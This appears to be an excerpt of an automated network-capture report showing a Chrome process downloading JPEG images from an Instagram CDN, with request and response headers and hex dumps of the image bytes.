                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 55 fb a0 0c 86 19 9c 94 60 8a 65 9c 01 2f c5 42 49 71 00 71 10 00 28 07 11 35 9c f9 4b 18 00 f3 cf 0e 42 58 2f 6c 00 46 63 3e 28 3b 73 e3 00 95 15 0a f7 2f 29 ae 10 0f 2e 3c 3b e7 20 9e d8 00 77 a0 cf 31 8e 40 f1 80 78 e4 32 c2 6b f8 9f 7c 02 4c 93 30 09 4f 6a 63 01 35 d2 14 4d 4e 27 ec 38 40 46 4e 9b 8a 1c 25 c3 df 00 6a 9a 60 17 11 23 00 f4 84 d4 09 39 cf 97 74 00 09 99 32 2e 01 3d 9e e8 06 02 4c 15 72 4c 28 e4 b0 10 9e a9 c8 92 01 4e e8 09 7e f1 0a 40 1c d3 87 c6 00 50 d5 49 12 88 13 2f ba 00 56 ff 00 1b bd a7 f0 80 0a 66 48 05 11 33 e2 4f 38 00 6a 1f 28 51 91 3f b4 67 00 ca 9c 00 25 3c 5c 94 71 80 02 65 f3 06 a2 76 7e 70 17 a5 0f fa 76 d4 be 2f f3 a7 4e 8c b4 ff 00 81 97 56 38 ac a3 5c 2f 08 d3 92 b2 83 0c 27 39 84 18 22 e4 10 24 64 b2 c6 40 7b d6 68
                                                                                                                                                                                            Data Ascii: U`e/BIqq(5KBX/lFc>(;s/).<; w1@x2k|L0Ojc5MN'8@FN%j`#9t2.=LrL(N~@PI/VfH3O8j(Q?g%<\qev~pv/NV8\/'9"$d@{h
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 5e 0b 9f 62 c0 2e 65 48 5c 78 cd 0f 79 02 00 53 8f e4 0a ca 49 9c 03 ef e5 34 9f 15 32 21 7d b0 0a 58 8f 60 c3 39 fb b0 80 30 5c 47 bb 1f 6e 09 00 4f 98 49 99 9c 70 f6 ac 01 3f 72 a7 b1 72 06 63 dd 00 65 db 3f 74 fb 16 00 0a 9c 96 7c 3b 14 4b 3e d8 03 92 a4 b3 c3 9a 22 a8 80 67 19 c9 06 18 c8 cb 0c 33 80 26 02 e6 80 82 83 8a 4b b8 f7 40 48 c8 4f c5 3e cc a0 22 b2 91 49 fc b8 93 84 d7 18 00 c8 af cd c4 89 72 45 18 40 0a b2 9c f3 53 9f 2c d2 02 42 4a 27 21 c4 ce 59 70 80 15 02 aa ff 00 47 31 df 8c a0 11 43 e2 51 91 4e c1 82 ac 04 9a 57 22 06 2a 49 3f 18 04 80 80 54 2a 09 99 fb 72 80 48 3f 89 be c6 c0 03 07 7e f4 d1 3b 39 40 4c 61 86 9f ba 02 18 66 1d cd 02 37 9e 62 02 47 09 19 a6 23 12 3f 33 01 7a 54 7f a7 4c 3c 5f e7 56 0a 75 27 f8 1b 05 c5 33 8d 71 b4 23
                                                                                                                                                                                            Data Ascii: ^b.eH\xySI42!}X`90\GnOIp?rrce?t|;K>"g3&K@HO>"IrE@S,BJ'!YpG1CQNW"*I?T*rH?~;9@Laf7bG#?3zTL<_Vu'3q#
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 6d 14 03 c4 ad 90 74 06 c1 3d 01 f5 0a 8f a8 5b 03 f6 8d ca ad 33 d4 3b 55 0a 63 75 a6 f2 d0 db 8b 5a 8d f2 ed 37 9a 5a 43 4b 29 bd 05 3b 80 30 55 22 50 17 3b 69 a9 5f a7 77 ca d6 8f 24 54 bb ac d3 4e a3 c6 97 50 ab 4e bb 8d 8d 55 0a 5d 6c 74 9a 44 89 87 84 3f 34 07 b3 f5 c7 a5 6d 7d 47 e8 7a 5b db 68 53 fd 7e cd 44 32 e6 98 57 5c 7e 8a a3 41 b9 7d 12 cd 47 ce b6 a8 d6 d5 6a 48 3e 91 23 38 0d 77 dc 5c ee 1d 3f bb 8d ed 94 4b 6b d0 7b 36 5e a7 b4 a4 ef 2b cf 60 02 ad a6 eb 6e 13 40 6d 5b 66 6b 69 0a 45 51 39 3a 03 3c 7d 3c ea 1b 7e b1 d8 1b 6a ea b6 b5 aa 5a b1 b4 29 b0 69 f2 aa 83 4c 13 6b 76 c2 a4 35 ec 21 1d 30 35 cb 08 0b 89 b3 39 c7 f4 f6 bf cd 6d ee d8 da 87 6d ae ef 1d d1 b1 7d 42 2b 5b d5 71 25 b5 6a d8 d5 f9 b1 05 aa 82 03 a7 d4 fb 0d 0d e9 95 1c
                                                                                                                                                                                            Data Ascii: mt=[3;UcuZ7ZCK);0U"P;i_w$TNPNU]ltD?4m}Gz[hS~D2W\~A}GjH>#8w\?Kk{6^+`n@m[fkiEQ9:<}<~jZ)iLkv5!059mm}B+[q%j
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: cc c9 07 15 80 d2 ff 00 d4 67 d1 2e db bf ef 15 2b 01 75 6f 6b 75 54 d6 b8 ad 46 bb 87 90 03 8a 9a 6d f0 07 55 2d f0 e9 49 99 89 08 0c 41 ad f4 d7 e8 2f a6 1f f3 1b ed 46 6f 3b 9d 32 94 d9 5e 98 7d 46 a6 05 8d aa e7 30 f9 67 e7 73 94 af b2 03 d6 74 6d af 42 5d 75 0e d1 42 c3 a7 ac a8 51 b8 dc a8 58 52 3a 69 0a 95 3c df e5 53 ab a5 ad 14 d8 e2 5d e1 01 0e ac 65 28 0f a6 ff 00 46 3a 16 df d3 7f 4c ba 53 a4 28 0a 7a b6 dd b6 9d 4b 97 51 60 63 5f 75 7a e3 77 5c e9 01 be 26 ba a8 6c b8 4a 50 18 a9 fe e3 9d 3a ed eb d0 53 7e d7 86 3b 64 de 05 7d 04 12 2a 8b ab 4a d4 4b 4a 34 96 81 a0 38 e0 89 8c 07 c8 57 aa 04 25 6b 22 29 97 1f 32 af 99 53 e6 23 51 0f 0a 11 8f 6e b2 a2 4a 12 03 17 df 62 dd 48 c6 80 1c e7 b5 a8 7c 6c 56 92 e7 b5 02 02 40 c4 19 40 73 33 62 a3 73
                                                                                                                                                                                            Data Ascii: g.+uokuTFmU-IA/Fo;2^}F0gstmB]uBQXR:i<S]e(F:LS(zKQ`c_uzw\&lJP:S~;d}*JKJ48W%k")2S#QnJbH|lV@@s3bs
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 20 d7 29 99 19 67 01 f3 0b ea 45 f5 dd 2b 67 36 ad bb ed ab b1 a8 1f 4d 5a fa 9a b4 87 56 18 b9 a1 01 45 ce 03 1d 2d 7a a3 a5 a8 ee f4 f6 6b fd ef 65 b7 de 6b e9 34 76 9b 8b fb 5a 57 af 15 1c 41 d7 45 f5 41 63 de 48 20 38 b4 bc c8 40 56 7a f3 6f b2 af d3 77 b4 6a b1 b5 59 56 ce b3 6b 07 69 d0 c6 be 8b dc 03 58 0e 05 06 93 8e 50 18 bd e9 ce cf 77 d3 cf 7d 7a 95 52 9b ab 3d d3 d4 5a ca 6e d3 a5 ca e3 a9 ba 80 f1 34 2a 60 60 32 ff 00 67 dc da fb 56 2c c5 49 d3 21 c1 e4 38 b7 c4 0b 5a 74 91 a4 c8 91 2c a5 00 5d 55 63 dd 51 a8 d6 6b 70 a7 ab 4e b6 3d 0e 96 d5 68 72 b4 8a 68 17 48 00 e3 38 0a 15 de aa 8e 7d 36 7f 2d ae f1 55 9e 97 3e a5 30 8e 5c a9 ea 69 50 06 62 03 c8 6e c0 6b a9 c5 81 ad 6a 78 51 ae 5f 11 00 62 c5 93 88 39 f6 40 78 7b eb 77 37 58 51 ae 93 7c
                                                                                                                                                                                            Data Ascii: )gE+g6MZVE-zkek4vZWAEAcH 8@VzowjYVkiXPw}zR=Zn4*``2gV,I!8Zt,]UcQkpN=hrhH8}6-U>0\iPbnkjxQ_b9@x{w7XQ|
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: ee 24 d4 45 12 cb 1c a0 33 0b 6a ac 2e eb 51 a7 51 52 9d 40 e6 87 02 d2 10 2b 51 26 5c 4f ca b0 17 92 98 02 d1 a5 a8 7c 20 38 92 08 73 a6 88 02 10 e0 a8 9c e0 1d ab 40 a3 4c e1 a5 4b f5 82 49 04 0f 09 2e 9b f4 b9 c9 c5 25 01 c5 73 6d a6 8d c5 5d 20 38 53 a8 fa ba 81 3a a9 bb c3 4e 9e a3 20 e2 7e 50 10 94 c8 40 6a ff 00 d5 db ef d7 f5 56 f5 b9 55 ab ae 86 ca da b6 d6 cd 7b ff 00 96 eb a7 78 5f 50 96 94 46 54 56 86 81 8b 60 3c ef a4 5d 38 6e 6b 37 7b a8 c6 55 17 77 62 85 2a 95 54 07 52 35 3c db 9a a4 64 d2 d6 c8 aa 84 48 0b c2 cd ae 96 f7 d7 15 ad 29 03 54 39 f4 8d 2a 6d f1 79 67 58 76 a4 05 5a c6 52 01 0c d3 51 51 01 91 3d 2d d3 f5 19 56 ae dd 51 8f a9 56 f3 76 a5 6f 4d 29 b8 bc 50 6b 05 41 e4 01 f3 b2 a0 66 80 3b 56 42 03 29 36 dd 9e d7 61 a9 60 eb 96 84
                                                                                                                                                                                            Data Ascii: $E3j.QQR@+Q&\O| 8s@LKI.%sm] 8S:N ~P@jVU{x_PFTV`<]8nk7{Uwb*TR5<dH)T9*mygXvZRQQ=-VQVvoM)PkAf;VB)6a`
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: e0 2a 30 85 06 9b 8a a3 10 a3 d8 5a 53 50 0e f8 c0 79 fd cf 71 36 cf 1a 1c 2a 37 c4 e3 a9 5c 41 6a f8 ab eb 23 4b 4a c8 83 97 b0 2c 6f 5b fa ab 6f b2 35 b4 ec 2a 36 e7 71 aa 7c 91 e5 b8 7e 9a 83 9c e0 d7 9a ae 0e 9e 92 88 1b 22 64 4a 40 60 ef a9 dd 53 79 bf 6f 2f 1b b5 cd 7b eb c6 dd b2 ca de 8b ea 6b 00 3c a0 0c a7 ab 45 0a 4d d4 48 41 97 7c 06 e5 7f d9 c3 d1 3e 84 df fa 1b d6 5f 54 fa a7 65 b5 a5 7f d3 3d 45 b3 da 33 72 ba 6b 6a 03 d2 fb 6d ad 6d e3 75 b7 b5 7d 56 2d 3f d6 57 a6 cf 35 c3 e6 a7 4f 4e 06 61 b8 af a5 5b 9d a3 ad fd 55 f5 0f d4 2a d6 f6 f4 3f ce 1f 4e 77 0d 8f 63 da 2a db 30 57 d9 f6 1d a2 ad 7b 0d a6 ad 46 95 35 28 df d2 76 a2 e0 24 e7 15 c9 42 c5 50 e9 a4 a7 79 b3 df b2 cf f5 7d 29 7d 7d 63 b8 53 73 29 04 a5 42 ea a9 06 ad 16 80 fa 74 ad
                                                                                                                                                                                            Data Ascii: *0ZSPyq6*7\Aj#KJ,o[o5*6q|~"dJ@`Syo/{k<EMHA|>_Te=E3rkjmmu}V-?W5ONa[U*?Nwc*0W{F5(v$BPy})}}cSs)Bt


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            36192.168.2.1649754157.240.249.634436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC621OUTGET /v/t51.2885-15/466782117_1219872592424759_7207578631427954565_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=bwWPeBBNLe4Q7kNvgEG96g1&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYBDimk3lRDq0ZNf5WzC3TsApGkaW3ypEC04xNJeJXPwgg&oe=67416EA5 HTTP/1.1
                                                                                                                                                                                            Host: scontent-ord5-1.cdninstagram.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:07 UTC582INHTTP/1.1 200 OK
                                                                                                                                                                                            x-additional-error-detail:
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 22:01:51 GMT
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            X-Needle-Checksum: 2333707590
                                                                                                                                                                                            content-digest: adler32=2333707590
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=1209600, no-transform
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=21, rtx=0, c=13, mss=1380, tbw=3357, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 92324
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1INData Raw: ff
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1500INData Raw: d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 09 06 07 08 07 06 09 08 08 08 0a 0a 09 0b 0e 17 0f 0e 0d 0d 0e 1c 14 15 11 17 22 1e 23 23 21 1e 20 20 25 2a 35 2d 25 27 32 28 20 20 2e 3f 2f 32 37 39 3c 3c 3c 24 2d 42 46 41 3a 46 35 3b 3c 39 ff db 00 43 01 0a 0a 0a 0e 0c 0e 1b 0f 0f 1b 39 26 20 26 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 ff c0 00 11 08 04 38 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23
                                                                                                                                                                                            Data Ascii: JFIFC"##! %*5-%'2( .?/279<<<$-BFA:F5;<9C9& &9999999999999999999999999999999999999999999999999988"}!1AQa"q2#
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 a9 eb 5f f2 07 be ff 00 af 79 3f f4 13 57 2a 9e b5 ff 00 20 7b ef fa f7 93 ff 00 41 35 15 3e 07 e8 5d 3f 8d 7a 9c 66 9f e0 ad 6e fa da 3b 88 a0 8c 24 8a 19 4b 48 01 20 d4 e7 e1 f7 88 47 fc b0 84 ff 00 db 51 58 9a 7e b3 a8 e9 ce ad 6b 79 2a 05 39 0a 18 95 fc ba 57 b7 78 7b 53 5d 5b 47 b5 bd 18 06 44 f9 80 e8 1b a1 1f 9d 78 98 7a 34 6a e9 ad cf 4b 1b 8a c5 61 6d 2d 1a 7e 4f fc cf 2c ff 00 85 7f e2 0f f9 e3 0f fd fd 15 8b ad 68 d7 ba 24 f1 c1 7b 1a a3 c8 bb d7 6b 06 c8 ce 3b 57 a3 fc 4c 7d 4a da ca da f6 ca ee 68 51 1b 64 ab 1b 11 9c f4 3f a6 3f 1a f2 eb bb bb 8b c7 0f 75 71 24 ce 06 01 91 8b 10 2b 2c 45 3a 74 9f 2a 4e e6 f8 0a f5 f1 11 55 24 d5 bb 59 dc db
                                                                                                                                                                                            Data Ascii: ((((((((_y?W* {A5>]?zfn;$KH GQX~ky*9Wx{S][GDxz4jKam-~O,h${k;WL}JhQd??uq$+,E:t*NU$Y
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: 99 e4 ba b8 96 e2 66 dd 2c ac 59 8f a9 35 1d 14 57 0b 77 3d 68 c6 ca c8 2b d2 3e 14 6a e4 8b 9d 2a 43 c0 fd ec 59 fc 98 7f 23 f9 d7 9b d5 ad 37 50 ba d2 ef 23 bc b4 93 cb 95 33 83 8c 8e 46 0f 15 b5 0a be ca 6a 47 2e 33 0f f5 8a 2e 9f 5e 9e a7 6f f1 63 53 2f 71 6b a6 23 7c b1 8f 36 41 ee 78 5f d3 3f 9d 79 f5 59 d4 2f ae 35 2b c9 2e ee a4 df 33 fd e6 c0 1d b1 d0 55 6a 2b d5 f6 b3 72 1e 0e 87 b0 a3 1a 7d bf 30 a2 8a 2b 03 a8 2b d5 74 5f f9 03 d8 ff 00 d7 bc 7f fa 08 af 2a af 55 d1 7f e4 0f 63 ff 00 5e f1 ff 00 e8 22 bd 4c af e3 97 a1 e5 66 bf 04 7d 4b b4 51 45 7b 67 8a 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 5f d3 2c 45 c1 32 4b 9f 2c 1c 63 fb c6 b6 56 d6 dd 46 04 11
                                                                                                                                                                                            Data Ascii: f,Y5Ww=h+>j*CY#7P#3FjG.3.^ocS/qk#|6Ax_?yY/5+.3Uj+r}0++t_*Uc^"Lf}KQE{gQEQEQEQEQEQEQEQEQEQEQE_,E2K,cVF
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: 4b b8 2e 36 f5 f2 a4 0f 8f ca 98 16 28 a2 aa be a3 62 90 c9 3b de db 2c 31 b6 c7 73 2a 85 56 f4 27 3c 1e 45 00 5a a2 aa d8 ea 56 1a 80 63 65 7d 6d 74 17 af 93 2a be 3f 23 52 5e 1b 7f b3 48 b7 4c 8b 0b 0d ac 5d b6 8c 1f 7a 40 3d 25 8d d9 d5 1d 59 90 e1 80 39 2a 7d eb 2b c5 1e 20 87 c3 7a 69 be 9e da e2 68 c3 05 3e 56 df 94 9e 99 c9 18 1f 9d 71 9f 07 ee ed 2d 6c 35 78 e5 b9 8a 31 f6 b3 b7 cc 90 02 46 3a f3 d6 b6 be 2c 10 de 04 bc 65 20 82 d1 10 47 7f 9d 69 5f 4b 91 cf 78 73 23 a8 d3 2e c5 fe 9b 69 78 13 60 b8 85 25 db 9c ed dc 01 c6 7f 1a b3 59 1e 1e 9a 28 3c 2d a4 bc d2 a4 69 f6 38 46 e7 60 07 dc 1e b5 a5 05 cc 17 20 98 27 8e 50 bd 4a 38 6c 7e 54 cb 4f 42 5a 2a 39 a6 8a 04 df 34 a9 1a 74 dc ec 00 fd 69 62 96 39 a3 12 45 22 c8 87 a3 29 c8 3f 8d 30 1f 4d 90
                                                                                                                                                                                            Data Ascii: K.6(b;,1s*V'<EZVce}mt*?#R^HL]z@=%Y9*}+ zih>Vq-l5x1F:,e Gi_Kxs#.ix`%Y(<-i8F` 'PJ8l~TOBZ*94tib9E")?0M
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4044INData Raw: f2 3f ba 6a e2 fa 1d 34 6a 7d 96 78 d7 86 35 eb 2d 07 c4 1e 35 b9 bc 7e b7 db 62 89 7e fc ad e6 4b 85 51 fe 71 5d 9e 91 a2 4f 73 7c ba de ba 23 93 50 c6 20 80 7c d1 da 29 ec be ad ea df 97 15 c2 68 9e 19 b3 f1 2e bb e3 6b 6b 90 16 65 bb 6f 22 6e f1 31 92 4e 7e 87 03 3e d5 d3 fc 36 d6 ee e5 bd 7f 09 6b 4d e5 ea 96 99 58 9d cf fa d4 03 d7 b9 03 91 ea 39 ec 68 5e 63 8b b7 c5 b1 73 e2 95 a2 5c 78 1b 53 95 e3 04 db 88 e4 56 23 94 3e 62 8e 3f 32 2b 53 e1 97 83 34 75 f0 ae 9b a9 5f 5a 45 a8 de dd 5b 23 19 6e 94 4b b1 31 f2 a2 86 c8 50 06 07 15 6f e2 cd b2 5a fc 30 d6 63 4f ee 47 93 dc 9f 35 2b 67 e1 df fc 88 9e 1f ff 00 af 08 7f f4 11 52 dd d9 8d 49 f3 4a e7 07 e2 1b 48 bc 01 f1 0b 40 bd d1 97 ec da 76 b5 2f d9 ae ed 23 e2 2c e5 46 e0 bd 07 df 07 8f ee 9f 5a ed
                                                                                                                                                                                            Data Ascii: ?j4j}x5-5~b~KQq]Os|#P |)h.kkeo"n1N~>6kMX9h^cs\xSV#>b?2+S4u_ZE[#nK1PoZ0cOG5+gRIJH@v/#,FZ
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: 0d bf 67 69 c2 82 bf dd 24 00 71 ec 08 ae aa 8a 2c 0e 29 ea 73 da 27 83 f4 ed 0f 56 b8 d4 34 f9 ae 62 fb 40 da f0 65 3c a0 3b 00 36 e4 63 eb 46 bd e1 1b 4d 73 54 b5 d4 2e 2f af e2 9a d0 83 02 c2 c8 15 08 39 cf 2a 79 c8 1d fb 57 43 45 16 0e 55 6b 08 06 00 19 27 dc d5 0d 6b 43 d3 75 db 75 b7 d4 ed c4 b1 2b 65 48 3b 5d 0f aa 91 d0 d6 85 14 0d ab ab 32 28 bc 0c 64 b5 5b 4b 9f 13 eb b7 7a 69 18 fb 34 93 a8 de bf dd 67 0a 1c 8c 76 cd 4f e1 3f 02 69 9e 14 d4 6f ef 34 bb 9b b5 5b d3 99 2d 9d 90 c4 bc 92 bb 40 50 46 32 40 e7 a1 ad ad 1a e3 cc 83 ca 27 e6 8f a7 d2 b4 ab 36 ac 70 4a 3c ae c1 59 fa de 95 65 ae e9 77 1a 6d fc 22 5b 59 d7 0e a4 e3 dc 10 7b 10 70 6b 42 8a 44 9c 2e 9d f0 e8 69 d0 0b 3b 7f 14 f8 85 34 f1 c2 db 2d ca 80 a3 fb a1 82 e4 0f a6 2a ce 91 f0 f3
                                                                                                                                                                                            Data Ascii: gi$q,)s'V4b@e<;6cFMsT./9*yWCEUk'kCuu+eH;]2(d[Kzi4gvO?io4[-@PF2@'6pJ<Yewm"[Y{pkBD.i;4-*
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: eb 17 8d be 67 52 44 51 67 f8 23 5e c0 74 cf 53 de b8 df 8f 62 68 34 dd 1e 78 ae ae 63 f3 2f 04 32 46 93 30 8d d4 82 79 5c e0 9e 3a e3 bd 77 5e 0c f1 35 97 8a f4 38 75 3b 26 c1 6f 96 68 89 cb 44 e3 aa 9f e8 7b 8c 57 0f fb 41 ff 00 c8 13 44 ff 00 b0 8a ff 00 e8 2d 40 1e 97 a9 40 2e 74 fb 98 0c 92 c5 be 36 1b e2 72 8e bc 75 04 72 0d 78 bf c1 ff 00 0f cf e2 dd 12 f2 e3 5b d4 af 6e 34 c4 bb 60 2d 04 ec a2 69 76 2e e6 91 81 dc c3 1b 40 19 f5 af 70 9f fd 44 9f ee 9f e5 5e 61 fb 3a 7f c8 8d 77 ff 00 61 19 3f f4 5c 74 01 5b c7 3a 00 f8 7d 69 17 89 fc 27 24 d6 49 6d 2a 0b bb 2f 35 9a 09 91 8e 39 52 4e 0e 48 1f 8e 46 08 af 46 7d 72 d9 3c 34 75 e6 0d f6 51 67 f6 cc 77 d9 b3 7e 3e b8 ae 6f e3 67 fc 93 1d 67 fe d8 7f e8 e8 e9 d0 cd 65 07 c1 cb 57 d4 03 35 a1 d0 e2 59
                                                                                                                                                                                            Data Ascii: gRDQg#^tSbh4xc/2F0y\:w^58u;&ohD{WAD-@@.t6rurx[n4`-iv.@pD^a:wa?\t[:}i'$Im*/59RNHFF}r<4uQgw~>oggeW5Y
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: a1 34 36 f7 57 01 25 89 30 01 c3 2f 70 33 c8 27 23 38 ab 1e 09 d2 af 24 d6 f5 6f 12 df 5b bd a3 5f 90 90 5b b8 c3 ac 63 1c b0 ec 4e 17 8f ad 50 f8 a9 ff 00 21 4f 0a ff 00 d7 ef fe cc 94 74 13 bf 26 a7 65 e2 16 b9 8f 43 be 96 ce e0 db dc 47 0b 48 92 6c 0d 82 06 7a 1e 3b 57 09 e1 08 fc 4f e2 bd 09 27 9f 5e 96 ca d8 3b 81 24 20 19 a6 6c f7 3c 6d 51 d0 01 5d ee bf ff 00 20 2d 47 fe bd a5 ff 00 d0 4d 73 5f 08 7f e4 49 b7 ff 00 ae d2 7f e8 54 3d ca 92 bc 92 34 2f ac ef 2c 3c 09 a9 db 5f 5e bd ed ca 59 5c 6e 9d 86 0b 7c ad 8f d3 15 43 e1 8c 46 7f 87 96 90 ac af 11 90 4c a2 48 c8 0c 99 76 19 19 ee 2b 7b c5 7f f2 2b eb 1f f5 e5 37 fe 80 6b 17 e1 3f fc 88 7a 7f fb d2 ff 00 e8 c6 a3 a8 5b df 4b c8 e5 bc 23 a4 4b 71 e3 5f 12 5b 2e af a8 c2 d0 b8 06 68 9d 03 cb f3 1f
                                                                                                                                                                                            Data Ascii: 46W%0/p3'#8$o[_[cNP!Ot&eCGHlz;WO'^;$ l<mQ] -GMs_IT=4/,<_^Y\n|CFLHv+{+7k?z[K#Kq_[.h
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: 7f da b3 af d9 3e c6 ca 5b ed 29 bb 3d 07 4c 13 c9 e3 eb eb 13 78 d7 c4 ba 7b 67 53 f0 74 ed 8f bd 2d b9 24 0f c8 30 fd 6a df 8c f4 9d 56 1f 13 e9 9e 27 d3 2d be dd f6 24 31 49 6c 0e 18 af cd ca fa 9c 39 fc 87 5a bf 0f 8d ec dd 40 6d 2b 5b 8e 7e f0 9b 17 2c 0f e1 c5 23 2e af 5b 12 78 57 c6 ba 5f 89 64 68 2d c4 b0 5d a0 dc d0 4c b8 6c 77 20 8e 0f f3 aa 7e 3a f0 e6 ad af 5f e9 33 58 35 8a 47 61 27 9d fb f9 1c 17 6c a9 c6 02 9e 3e 5f d6 a5 d2 f4 f9 f5 4f 14 af 88 67 d3 8e 9d 1c 30 34 31 24 98 13 4c 4f f1 38 1d 00 1c 01 d6 ba ca 7b 94 93 92 b4 8a 1a cc 17 77 7a 2d dd bd b2 c0 2e a7 85 a3 51 23 90 8a 58 60 9c 80 4f 19 f4 e7 da b2 7c 03 a2 5f f8 7b 44 fe ce bf 6b 57 29 23 32 3c 0e cd 90 79 e7 2a 31 cd 74 b4 50 55 b5 b9 9b e2 2b 5b bb fd 0e fa ca cf c9 f3 ee 61
                                                                                                                                                                                            Data Ascii: >[)=Lx{gSt-$0jV'-$1Il9Z@m+[~,#.[xW_dh-]Llw ~:_3X5Ga'l>_Og041$LO8{wz-.Q#X`O|_{DkW)#2<y*1tPU+[a


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            37192.168.2.1649755157.240.249.634436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC620OUTGET /v/t51.2885-15/466498990_932073868801787_4615250428975556945_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=K2QYvU4QDFwQ7kNvgHexzPp&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYB6H6C6vXmQz4o0NOzYmapDE6_aoksGSCqZ4e0xcfBfbw&oe=6741529C HTTP/1.1
                                                                                                                                                                                            Host: scontent-ord5-1.cdninstagram.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:07 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                            x-additional-error-detail:
                                                                                                                                                                                            Last-Modified: Mon, 11 Nov 2024 20:01:38 GMT
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            X-Needle-Checksum: 2844738950
                                                                                                                                                                                            content-digest: adler32=2844738950
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=1209600, no-transform
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=22, rtx=0, c=13, mss=1380, tbw=3356, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 228898
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1INData Raw: ff
                                                                                                                                                                                            Data Ascii:
